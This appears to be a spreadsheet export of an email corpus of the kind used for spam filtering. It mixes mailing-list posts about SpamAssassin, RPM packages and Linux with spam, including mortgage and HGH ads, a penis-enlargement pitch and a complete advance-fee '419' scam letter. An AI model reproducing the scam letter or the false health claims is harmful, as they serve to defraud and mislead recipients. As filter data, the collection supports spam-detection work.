    <t xml:space="preserve">Subject: compare mortgage rate                  YLON
</t>
  </si>
  <si>
    <t xml:space="preserve">Regarding
 Dare to Compare!
 Do you have the LOWEST Mortgage rate available?
 * Compare our rates. 
 * No obligation.
 * Search hundreds of lenders instantly.
 * Free qoutes.
 * ALL Credit Accepted. A,B and subprime!
 One thing we all know, rates won't stay this low forever.
 Search now:
 http://MdgM6ImtdB@rapid-mortgage.com
 Unlist;
 http://MdGMq1Mttn@rapid-mortgage.com/remove.html
</t>
  </si>
  <si>
    <t xml:space="preserve">James Rogers wrote:
 &gt; 
 &gt; I don't think a ballistic missile defense system will be much help
 &gt; against a rock a couple thousand kilometers in diameter.
 Doesn't apply to this one; you're off by three orders of magnitude.
 Only 2km diametre, this one.  Of course, that's still a lot of mass
 to hit the planet even if it *is* in the form of dust and gas.
 Even if Shrub's wrist-rocket managed to vaporise it, we'd still get
 transference to the Earth's energy balance, only to the atmosphere
 rather than the litho- or hydrosphere.
 -- 
 #ken	P-)}
 Ken Coar, Sanagendamgagwedweinini  http://Golux.Com/coar/
 Author, developer, opinionist      http://Apache-Server.Com/
 "Millennium hand and shrimp!"
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] MANUEL OKO
</t>
  </si>
  <si>
    <t xml:space="preserve">ATTN:SIR/MADAN      
                                                              STRICTLY CONFIDENTIAL.
 I am pleased to introduce myself  to you.My name is Mr. Manuel Oko a native of South Africa and a senior employee of mines and natural resources department currently on a trainning course in Holland for few months.
 I  am writing this letter to request your assistance in order to redeem an investment with the South African mining Corporation.The said investment, now valued at  ($15.5 million dollars ) Fifteen  million,five hundred thousand dollars only was purchased by Lucio Harper and contracted out to the South  African Mining Corporation in 1977 now recognised as mines and natural resources department.This redeemable investment interest,has now matured since March last year.
 Since MARCH last year, several attempts have been made to contact Lucio Harper without success and there is no way to contact any of his close relatives in whose favour the investment cash value can be paid.                                                    
 Since we have access to all Lucio Harper's information,we can claim this money with the help of my partners with the South African Mines and natural resources department.All we have to do is to file claim using you as Lucio Harper's relative.
 I will like to assure you that there is absolutely nothing to worry about,because it is perfectly safe with no risk involved.Please ensure to keep this matter strictly confidential.My partner will file a claim for this money on your behalf from the SouthAfrican mining Corporation.When the claim is approved,you as the beneficiary 
 will be paid (25%) of the total amouth.
 Since this money can be paid directly into any bank account of your choice,you have responsibility to ensure that my partner and Ireceive(70%)of the total amouth.While the balance (5%) will be set aside for any unforseen expenses in the cause of transfering this money.
 I will appreciate if you can give your assurance and guarantee that our share will be well secured.Please for the sake of confidentiality,reach me on my e-mail address:  manueloko1000@netscape.net .  Please let me know if this proposal is acceptable to you. Kindly reach me immediately with any of the stated contact addresses so that better clearifications 
 relating to the transaction will be explained to you.
 Truly yours
 Manuel Oko
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Male &amp; Female Celebs...Nude!                     23101
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAtalk] moving SPAM: results to bottom of message.
</t>
  </si>
  <si>
    <t xml:space="preserve">Is there a way to tell spamassassin to put the results at the bottom
 of the message instead?  If not, what is the easiest way to do this.
 I found a report_header, but no equivalent report_bottom.
 Thanks,
 Jon.
 jon.g@directfreight.com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</si>
  <si>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New testing packages
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,
 Just the kind of announce I make once in a while :
 - I've rebuilt a new "alsaplayer" package based on Angle's one.
 - I've rebuilt a hopefully final version "-fr8" of the "alsa-driver" and
   "alsa-kernel" packages which fix all known SMP build issues.
 Both can be found here :
 http://ftp.freshrpms.net/pub/freshrpms/testing/alsa/
 I've also repackaged gkrellm 2.0.2 with at last a separate package for the
 server that can be installed standalone and doesn't even require glib2.
 http://ftp.freshrpms.net/pub/freshrpms/testing/gkrellm/
 Last but not least, my latest proftpd 1.2.6 package incorporates some nifty
 new features : You can use any of "--with ldap", "--with mysql" and "--with
 postgres" when rebuilding the source rpm with rpmbuild to enable desired
 extra authentication methods and all package requirements are set
 accordingly, and the release tag is changed too.
 http://valhalla.freshrpms.net/ (the usual place ;-))
 I think I'll use this "--with &lt;whatever&gt;" switch more and more where
 possible. Some other of my package already use it like the xmame for its
 output targets, sqlrelay for its modules and my latest sylpheed claws spec
 to enable Pilot support.
 As usual, feedback and comments are welcome! :-)
 Matthias
 PS: Yup, I'm back from my holidays ;-)
 -- 
 Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
 Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10
 Load : 2.42 2.10 1.32, AC on-line, battery charging: 100% (7:12)
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: more site sales 5427181310976654443333322
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;center&gt;
 &lt;font face=verdana color=navy&gt;
 Do you take credit cards?&lt;p&gt;
 If you do you will make more money.&lt;p&gt;  Easy set up..no credit checks - 100% approval....&lt;p&gt;
 Make more money now!&lt;p&gt;
 &lt;a href=http://www.lowest-rate.net/cgi-bin/merchant_services.cgi?affiliate=510001&gt;TRY NOW&lt;/a&gt;&lt;p&gt;
 Remove info is found on web site&lt;p&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [IIU] mailman crash on list host
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi all --
 We had a pretty serious crash on the list host over the weekend, and it
 destroyed all configuration data.  As a result, I've had to rebuild the
 mailing list from various other sources -- including the archives of
 past list traffic.
 If you're a list subscriber, you may have received a "welcome to the list"
 mail. All well and good.  However, if you *used* to be subscribed to one 
 of the lists at some point in 2002, or never were (I'm hoping that didn't
 happen!), you may have also have received one of these.  Just go to the
 URL and click "unsubscribe", providing the password from the mail if
 necessary.
 If you're a list admin on any of the lists at lists.boxhost.net or
 taint.org, I'd appreciate if you could take a look and make sure the
 settings match up with what they used to be.
 Sorry about this :(
 --j.
 -- 
 'Justin Mason' =&gt; { url =&gt; 'http://jmason.org/', blog =&gt; 'http://taint.org/' }
 _______________________________________________
 IIU mailing list
 IIU@iiu.taint.org
 http://iiu.taint.org/mailman/listinfo/iiu
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Hgh: safe and effective release of your own growth hormone!30543
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
    &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8=
 859-1"&gt;
    &lt;meta name=3D"GENERATOR" content=3D"Mozilla/4.77 [en] (Windows NT 5.0; =
 U) [Netscape]"&gt;
    &lt;meta name=3D"ProgId" content=3D"FrontPage.Editor.Document"&gt;
    &lt;title&gt;Lose weight while building lean muscle mass  and reversing the
 ravages of aging all at once&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;center&gt;&lt;table BORDER WIDTH=3D"52%" &gt;
 &lt;tr&gt;
 &lt;td WIDTH=3D"90%" BGCOLOR=3D"#CCCCFF"&gt;&lt;b&gt;&lt;font face=3D"Arial"&gt;&lt;font color=3D=
 "#FFFFFF"&gt;&lt;font size=3D+2&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt; 
 &lt;center&gt;&lt;table BORDER=3D0 CELLSPACING=3D10 CELLPADDING=3D0 COLS=3D1 WIDTH=3D=
 "100%" &gt;
 &lt;tr&gt;
 &lt;td WIDTH=3D"100%" BGCOLOR=3D"#000000"&gt;
 &lt;center&gt;&lt;b&gt;&lt;font face=3D"Arial"&gt;&lt;font color=3D"#FFFFFF"&gt;&lt;font size=3D+2&gt;Hu=
 man
 Growth Hormone Therapy&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/center&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;center&gt;
 &lt;p&gt;&lt;b&gt;&lt;font face=3D"Arial"&gt;&lt;font color=3D"#FFFFFF"&gt;&lt;font size=3D+1&gt;Lose we=
 ight
 while building lean muscle mass&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face=3D"Arial"&gt;&lt;font color=3D"#FFFFFF"&gt;&lt;font size=3D+1&gt; and
 reversing the ravages of aging all at once.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;p&gt;&lt;font face=3D"Arial"&gt;&lt;font color=3D"#FFFFFF"&gt;&lt;font size=3D+0&gt;Remarkable=
  discoveries
 about Human Growth Hormones (&lt;b&gt;HGH&lt;/b&gt;) &lt;/font&gt;&lt;/font&gt;&lt;/font&gt;
 &lt;br&gt;&lt;font face=3D"Arial"&gt;&lt;font color=3D"#FFFFFF"&gt;&lt;font size=3D+0&gt;are chang=
 ing
 the way we think about aging and weight loss.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/center=
 &gt;
 &lt;br&gt; 
 &lt;center&gt;&lt;table WIDTH=3D"442" BGCOLOR=3D"#FFFFFF" &gt;
 &lt;tr&gt;
 &lt;td WIDTH=3D"229" HEIGHT=3D"2"&gt;&lt;b&gt;&lt;font face=3D"Arial, Helvetica, sans-ser=
 if"&gt;&lt;font color=3D"#000000"&gt;&lt;font size=3D+0&gt;Lose
 Weight&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face=3D"Arial, Helvetica, sans-serif"&gt;&lt;font color=3D"#000000"=
 &gt;&lt;font size=3D+0&gt;Build
 Muscle Tone&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face=3D"Arial, Helvetica, sans-serif"&gt;&lt;font color=3D"#000000"=
 &gt;&lt;font size=3D+0&gt;Reverse
 Aging&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face=3D"Arial, Helvetica, sans-serif"&gt;&lt;font color=3D"#000000"=
 &gt;&lt;font size=3D+0&gt;Increased
 Libido&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face=3D"Arial, Helvetica, sans-serif"&gt;&lt;font color=3D"#000000"=
 &gt;&lt;font size=3D+0&gt;Duration
 Of Penile Erection&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
 &lt;td WIDTH=3D"199" HEIGHT=3D"2"&gt;&lt;b&gt;&lt;font face=3D"Arial, Helvetica, sans-ser=
 if"&gt;&lt;font color=3D"#000000"&gt;&lt;font size=3D+0&gt; New
 Hair Growth&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face=3D"Arial, Helvetica, sans-serif"&gt;&lt;font color=3D"#000000"=
 &gt;&lt;font size=3D+0&gt; Improved
 Memory&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face=3D"Arial, Helvetica, sans-serif"&gt;&lt;font color=3D"#000000"=
 &gt; Improved
 skin&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face=3D"Arial, Helvetica, sans-serif"&gt;&lt;font color=3D"#000000"=
 &gt; New
 Hair Growth&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face=3D"Arial, Helvetica, sans-serif"&gt;&lt;font color=3D"#000000"=
 &gt; Wrinkle
 Disappearance &lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;center&gt;
 &lt;p&gt;&lt;b&gt;&lt;font face=3D"Arial"&gt;&lt;font color=3D"#FFFFFF"&gt;&lt;a href=3D"http://marke=
 t.businessonlinenow.com/hgh/"&gt;Visit
 Our Web Site and Lean The Facts: Click Here&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/center&gt;
 &lt;p&gt; &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Bush blew take two
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.washingtonpost.com/wp-dyn/articles/A63543-2002Sep10.html
 "MIAMI, Sept. 10 -- A two-gram rock of crack
 cocaine was found inside the shoe of Florida
 Gov. Jeb Bush's 25-year-old daughter by workers
 at the central Florida rehabilitation center
 where she is undergoing court-ordered drug
 treatment, Orlando police said today.
 Noelle Bush was not arrested because witnesses
 would not give sworn statements, but the
 incident is under investigation, according to
 Orlando police spokesman Orlando Rolon."
 Wow, the witnesses would not nark of a Bush girl in an era where there are
 no mare restrictions on being held without a cause?
 Imagine that...
 -tom
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAdev] [Bug 1046] Errors from 'perl Makefile.PL'
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.hughes-family.org/bugzilla/show_bug.cgi?id=1046
 ------- Additional Comments From spamassassin-contrib@msquadrat.de  2002-10-03 13:57 -------
 &gt; I've thought about this and PM_FILTER needs to die. I've now tried  
 &gt; multiple ways to make it just transparently work on 5.00503 and failed.  
 &gt; If anyone has any bright ideas please jump in. 
 &gt;  
 &gt; You see anyone upgrading from the CPAN shell will get a failure on the line: 
 &gt;  
 &gt;    use ExtUtils::MakeMaker 5.45; 
 Quite some modules from CPAN do have a line like this nowadays (I think or 
 read so somewhere, respectively). And the Perl error message is very clear: 
 "ExtUtils::MakeMaker version 5.45 required--this is only version 5.4302 at 
 Makefile.PL line 2." 
 &gt; Because it never gets chance to reach a "WriteMakefile" line with a  
 &gt; PREREQ_PM =&gt; { ExtUtils::MakeMaker =&gt; 5.45 } option. So the CPAN shell  
 &gt; can't automatically upgrade this module. I cannot think of any way  
 &gt; around this. 
 I could think of a solution: We could remove the "use" line and add the 
 version to PREREQ_PM. After WriteMakefile() we could add the lines 
   require ExtUtils::MakeMaker; 
   ExtUtils::MakeMaker-&gt;VERSION(5.45); 
 to do per hand what 'use ExtUtils::MakeMaker 5.45' does automagically; `perl 
 Makefile.PL` will die with a "Uncaught exception from user code: 
 ExtUtils::MakeMaker version 5.45 required--this is only version 5.4302 at 
 Makefile.PL line 103." there but we've got a Makefile. But I don't know if 
 CPAN will run the make anyway... 
 &gt; To add insult to injury, the PM_FILTER part gets run during pm_to_blib,  
 &gt; which would be fine, except ExtUtils::MakeMaker doesn't let you write a  
 &gt; MY::pm_to_blib - it's non-overridable! So even though we could  
 &gt; potentially copy the 5.45 ExtUtils::Install::pm_to_blib code somewhere  
 &gt; into the spamassassin codebase (I tried that first), we can't cause the  
 &gt; Makefile to call our code :-( 
 We could call the preprocessor on install time. That's not a very clean 
 approach but could work. 
 We can also overwrite pm_to_blib in the Makefile directly per postamble. We 
 already have a useless line "pm_to_blib: spamassassin doc/.made" there. Adding 
 some commands in this section gives some make warnings ("Makefile:933: 
 warning: overriding commands for target `pm_to_blib' Makefile:877: warning: 
 ignoring old commands for target `pm_to_blib'") but does work. Not a very good 
 solution either. 
 &gt; So I'm *strongly* against the current use of ExtUtils::MakeMaker 5.45  
 &gt; usage (if this were an Apache project this would be my veto vote), and  
 &gt; really hope we can find another way. 
 The "use MakeMaker::..." error message is IMHO quite clear, so I think it's ok 
 to require the user to do a manual update of ExtUtils::MakeMaker before the SA 
 installation. But that's just my opinion ;-) 
 I'll ask on makemaker@perl.org for the best solution. They should know. 
 ------- You are receiving this mail because: -------
 You are on the CC list for the bug, or are watching someone who is.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</si>
  <si>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Eugen Leitl writes:
 &gt; On Sun, 11 Aug 2002, Gordon Mohr wrote:
 &gt; 
 &gt; &gt; If you crypto-sign your outgoing mail, you don't have to set your
 &gt; &gt; mailwall whitelist to accept unsigned mail spoofed as being from you.
 &gt; 
 &gt; Users don't like entering passphrases when sending email. USB fobs, smart 
 &gt; cards or other removable hardware are not yet widespread.
 Bad assumption.
 A reasonable UI would have me enter my passphrase *at most* each 
 time I launch my mail program -- never more than once per day,
 sometimes once per week. 
 For some of myy workstations, I'd even be happy with the necessary
 signing key being cached on disk, so signing is automatic when I
 hit 'send'.
 If spammer code can read my local hard disk, I have bigger problems
 than spoofed spam.
 - Gordon
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Shelley Powers raises some interesting questions re whether RDF
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/23#When:9:19:32AM
 Date: Mon, 23 Sep 2002 16:19:32 GMT
 Shelley Powers raises[1] some interesting questions re whether RDF has a place 
 in syndication. She says that RDF is trying to build a persistent database (aka 
 the Semantic Web) and RSS is trying to flow news that has a short lifespan. I 
 had not heard this point before. It's worth thinking about. 
 [1] http://weblog.burningbird.net/archives/000541.php
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Debian-style task-packages for RH8.0 available
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,
 This has been hashed over a few times on various lists, now I finally got 
 around to doing something about it... You can now add
 "rpm http://koti.welho.com/pmatilai/ redhat/8.0 task" to your sources.list 
 and after apt-get update you can find out what's available with 
 'apt-cache search ^task-'
 These are generated directly from comps.xml of RH8.0 so they contain 
 exactly the same packages as you'll get by choosing the various categories 
 at install time. I didn't bother including SRPMS for these as they are 
 rather uninteresting, if you want you can re-generate the .specs by 
 running http://koti.welho.com/pmatilai/comps2task/comps2task.py.
 BTW the repository only contains the task-packages, you'll need an 
 apt-enabled mirror of RH8.0 in your sources.list to actually do anything 
 with it.
 -- 
 	- Panu -
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Feeling Lucky
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.aaronsw.com/weblog/000609
 Date: 2002-09-23T00:51:21-06:00
 I've received an _incredibly kind invitation_; I sure hope I can take it! I 
 feel sort of bad though, because I think other people deserve it more than I 
 do. 
 Hm, the next few weeks are pretty crazy: 
 *Thu 26:* Edward Tufte Course[1] and MSI[2] member's night, Chicago.
 *Fri 27:* OSCOM[3], Berkeley. Bookmobile launch[4], SF. _(Unlikely to attend.)_
 *SatSun:* Hoshana Rabba, Shemini Atzeret, Simchat Torah. _(Jewish Holidays)_
 *30-Oct3:* OSXCON[5], Santa Clara. _(Need someplace to stay. Anyone?)_
 *Mon 7:* Bernstein's oral argument in crypto export case[6], San Francisco. _
 (Ditto.)_
 *Tues 8:* Bookmobile[7] arrives in D.C.
 *Wed 9:* Lessig's oral argument in Eldred case[8], D.C.
 [1] http://www.edwardtufte.com/tufte/courses
 [2] http://msichicago.org/
 [3] http://www.oscom.org/conferences/berkeley2002/
 [4] http://webdev.archive.org/texts/bookmobile-open_house.php
 [5] http://conferences.oreillynet.com/macosx2002/
 [6] http://export.cr.yp.to
 [7] http://webdev.archive.org/texts/bookmobile.php
 [8] http://eldred.cc/
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Fly free
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: 1983@http://diveintomark.org/
 Date: 2002-12-01T15:39:49-05:00
 Upon arriving safely in Raleigh, our stewardess sang us this, to the tune of 
 Barney's I Love You, You Love Me: 
     We love you,
     You love us,
     We're much faster
     Than the bus. 
     We hope you've enjoyed our
     hos-pi-tal-i-ty,
     Marry one of us
     And you'll fly free. 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Looking for a file / directory in zip file
</t>
  </si>
  <si>
    <t xml:space="preserve">Is there a way to look for a particular file or directory in 100's of zip
 files??
 Something like zgrep but for the filename instead of a word
 Thanks Justin
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: you don't satisfy me               FGTPRIL
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;/HEAD&gt;
 &lt;BODY&gt;
 &lt;FONT SIZE=3D"4"&gt;&lt;B&gt; A man endowed with a 7 - 8" hammer is simply&lt;br&gt;
  better equipped than a man with a 5 - 6" hammer. &lt;BR&gt;
 &lt;BR&gt;Would you rather have&lt;br&gt;more than enough to get the job done or fall =
 very short. It's totally up&lt;br&gt;to you. Our Methods are guaranteed to incre=
 ase your size by 1 - 3"&lt;br&gt; &lt;A HREF=3D"http://202.109.114.136/index.php?10=
 004"&gt;Enter here and see how&lt;/A&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: gentoo 0.11.31 relased...
</t>
  </si>
  <si>
    <t xml:space="preserve">...see subject
 -- 
 regards from Germany
                    Matthias
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format...
 ------------=_1029244856-11739-4
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Disposition: inline
 Content-Transfer-Encoding: 7bit
 To view this newsletter in full-color, visit:
 http://newsletter.mediaunspun.com/index000018904.cfm
 MEDIA UNSPUN
 What the Press is Reporting and Why (www.mediaunspun.com)
 -----------------------------------------------------------------
 August 13, 2002
 -----------------------------------------------------------------
 IN THIS ISSUE
 -----------------------------------------------------------------
 * UNITED WE FALL?
 * SLEEPING WITH THE PENGUIN
 * OTHER STORIES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ADVERTISEMENT
 -----------------------------------------------------------------
 Ken Fisher offers his Quarterly Report for high net worth
 investors FREE of cost &amp; without obligation. Access the same
 investment research he uses to guide his clients at:
 http://pcg.fisherinvestments.com/newrespond/letter.asp?site=UNSP&amp;KC=1229EFCAD0000
 -----------------------------------------------------------------
 UNITED WE FALL?
 -----------------------------------------------------------------
 US Airways scored a $500 million bankruptcy court bailout.
 American Airlines announced a re-org. United Airlines' parent
 company's stock sank on speculation that UAL is next in line for 
 Chapter 11. It's a wonder none of this happened last September,
 but it's not much consolation to airline employees,
 shareholders, and customers that it's happening now.
 The Wall Street Journal had the most extensive coverage of
 American's plan as of Unspun's deadline. The airline will lay
 off 7,000 workers, ground some jets, cut back on flight
 amenities such as food, and retool its hub operations to make
 for longer layovers. "In the past, airlines were loath to have
 longer connection times because flights were listed in travel
 agents' computers by elapsed time," said the Journal. "Now,
 online booking tools and search engines most often list flights
 by price, not time." In this age of penny-pinching, American's
 worried about low-cost carriers, not the big guys like, um, US
 Air and United. 
 Speaking of United, it's hard to come up with a verb for its
 parent company's stock that doesn't invoke an air disaster.
 Let's just say it didn't go up yesterday. The $3.80 share price
 may be the least of UAL's worries while it waits for an
 increasingly unlikely $1.8 billion loan from the Air
 Transportation Stabilization Board. "The ATSB expects an
 applicant's workers, suppliers and creditors to make concessions 
 to help the airline repay the loans and thus protect U.S.
 taxpayers' interests," said the L.A. Times. Sounds nice for
 uninvolved taxpayers but not so good to some of United's unions, 
 which are balking at a wage cut. Workers did enough by deferring 
 $498 million in retroactive pay this year, said the
 36,000-member machinists' union. Analysts moaned in anti-labor
 frustration. 
 The basic problem here is too many empty airplane seats, and
 non-U.S. outlets didn't have a lot of sympathy. "The U.S.
 government has bailed out carriers with insurance subsidies and
 federal loan guarantees" while "European authorities have acted
 more wisely," letting Swissair and Sabena "go to the wall," said 
 the Financial Times. Canadian pundits agreed that America should 
 let a couple of airlines wilt, since the Canadian airline
 industry benefited from the demise of Canadian Airlines and
 Canada 3000. Paging Charles Darwin to the white courtesy
 phone... - Jen Muehlbauer
 -----------------------------------------------------------------
 ADVERTISEMENT
 -----------------------------------------------------------------
 You've heard about identity management, but do you know about
 the opportunities and business models that will emerge as a
 result? Download a free executive summary of Esther Dyson's coverage of
 identity management in Release 1.0. Learn more about the
 expanding market for these services and applications.
 http://release1.edventure.com/executivesummary.cfm?MCode=Unspun
 -----------------------------------------------------------------
 SLEEPING WITH THE PENGUIN
 -----------------------------------------------------------------
 The LinuxWorld Conference and Expo, which opened yesterday in
 San Francisco, will host two of the strangest bedfellows ever to 
 lie down with a stuffed penguin: Microsoft and Sun. These are
 companies that once referred to Linux as a "bathtub of code"
 (Sun) and "a cancer" (Microsoft), according to Sun's hometown
 paper the San Jose Mercury News.
 Both companies are taking Linux seriously despite the absolute
 numbers. By January 2, 2001, Microsoft had made as much on
 server software as all Linux vendors put together would reap in
 the entire year.
 Honors for the best attention-grabber on Microsoft's presence at 
 the show go to Brier Dudley, who opened his piece for the
 Seattle Times this way: "Microsoft executive Peter Houston
 wasn't too worried about the reception he'd get at LinuxWorld
 ... until he heard about the pie cannon."
 Wired informed us that the section of LinuxWorld where Microsoft 
 will be holding the fort is dubbed the Rookery -- "a place where 
 you can watch companies hatch and grow right before your eyes,"
 deadpanned reporter Michelle Delio, quoting Microsoft's Houston: 
 "Hatching isn't exactly on the agenda, but I certainly hope to
 grow."
 Turning to Sun, Unspun notes that five years ago a joke press
 release circulated on the Net claiming that Linux creator Linus
 Torvalds, then still living in Finland, was moving to Silicon
 Valley to work for Sun. The joke was that Sun had decided to
 scrap its Solaris operating system and instead concentrate on a
 version of Linux, to be called "Solinux." How time does make
 April fools of us all: Linus Torvalds is now thriving in Silicon 
 Valley (at Transmeta), and yesterday Sun Microsystems
 demonstrated Sun Linux 5.0. and introduced its first
 general-purpose servers running Linux.
 The Merc ran a comprehensive wrap of Sun's evolving attitude
 toward the upstart operating system. Sun has little choice but
 to embrace Linux, wrote reporter Therese Poletti, because some
 of its traditional Wall Street customers were deserting it.
 "Several investment banks have tossed out whole sections of Sun
 servers and replaced them with Intel-based servers running
 Linux," Poletti reported. And you thought Microsoft hated Linux? 
 - Keith Dawson
 Linux expo has come a long way
 http://www.siliconvalley.com/mld/siliconvalley/3847040.htm
 Microsoft changes its tune toward Linux (Seattle Times)
 http://makeashorterlink.com/?Q12B23181
 Microsoft Puts On the Tux 
 http://www.wired.com/news/linux/0,1411,54489,00.html
 (Hoax press release on "Solinux")
 http://www.ibiblio.org/dbarberi/fools/classic/1997/sun-pr.html
 Sun to name Linux-Solaris chief 
 http://news.com.com/2100-1001-949469.html
 Sun Microsystems flexes Linux to jab at Microsoft (Seattle
 Times)
 http://makeashorterlink.com/?A25B52181
 Microsoft and Free Software at the Same Show? It's True
 http://www.nytimes.com/2002/08/10/technology/10LINU.html
 Linux begins its descent into the enterprise
 http://www.internetnews.com/ent-news/article.php/1443811
 -----------------------------------------------------------------
 OTHER STORIES
 -----------------------------------------------------------------
 Ex-CEO Pleads Not Guilty to ImClone Fraud
 http://www.washingtonpost.com/wp-dyn/articles/A10407-2002Aug12.html
 Security flaw found in Microsoft Web browser (Reuters)
 http://www.philly.com/mld/philly/business/technology/3851394.htm
 Fed seen leaving rates unchanged
 http://www.msnbc.com/news/793177.asp
 Some Sad No-Signs of the Times 
 http://www.businessweek.com/bwdaily/dnflash/aug2002/nf20020813_0067.htm
 Publisher dodges bankruptcy bullet
 http://www.chicagotribune.com/business/chi-020812ziff.story
 Gates Foundation Walks Fine Line As It Increases Its Cable
 Holdings
 http://online.wsj.com/article/0,,SB1029180416481589035,00.html
 (Paid subscription required.)
 PGP defect reveals encrypted messages
 http://news.com.com/2100-1001-949368.html
 Bell Labs simplifies single sign-on
 http://www.theregister.co.uk/content/55/26624.html
 Bigger Bar Code Inches Up on Retailers
 http://www.nytimes.com/2002/08/12/technology/12CODE.html
 Damn the Constitution: Europe must take back the Web
 http://www.theregister.co.uk/content/6/26612.html
 Japanese Drop Out of New ID System (Newsday, AP)
 http://makeashorterlink.com/?T69B22181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Marketing: Cowpoke Productions (cowpokeproductions.com.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http://www.imakenews.com/eletra/remove.cfm?x=mediaunspun%2Czzz-unspun@spamassassin.taint.org
 To receive future messages in HTML format, use this link:
 http://www.imakenews.com/eletra/change.cfm?x=mediaunspun%2Czzz-unspun@spamassassin.taint.org%2Chtm
 To change your subscriber information, use this link:
 http://www.imakenews.com/eletra/update.cfm?x=mediaunspun%2Czzz-unspun@spamassassin.taint.org
 ------------=_1029244856-11739-4
 Content-Type: text/html; charset="iso-8859-1"
 Content-Disposition: inline
 Content-Transfer-Encoding: 7bit
 &lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;title&gt;M E D I A  U N S P U N&lt;/title&gt;
 &lt;!--  
 **********************************************************
 If you can read this message but the rest of the email 
 contains strange characters, your email program is not
 capable of displaying HTML email. Use your browser to read the
 complete newsletter online at: 
    http://newsletter.mediaunspun.com/
 To receive future messages in plain text format, use this link:
 http://www.imakenews.com/eletra/change.cfm?x=mediaunspun%2Czzz-unspun@spamassassin.taint.org%2Ctxt
 **********************************************************
 CREATED: August 13, 2002   
 --&gt;
 &lt;meta name="description" content=""&gt;
 &lt;meta name="keywords" content=""&gt;
 &lt;meta name="GENERATOR" content="iMakeNews"&gt;
 &lt;meta name="robots" content="ALL"&gt;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.a225813917453734-section_heading{color:#FFFFFF;background-color:#000000;font-family:arial;font-size:x-small;font-weight:bold;font-style:normal;text-decoration:none;text-align:left}
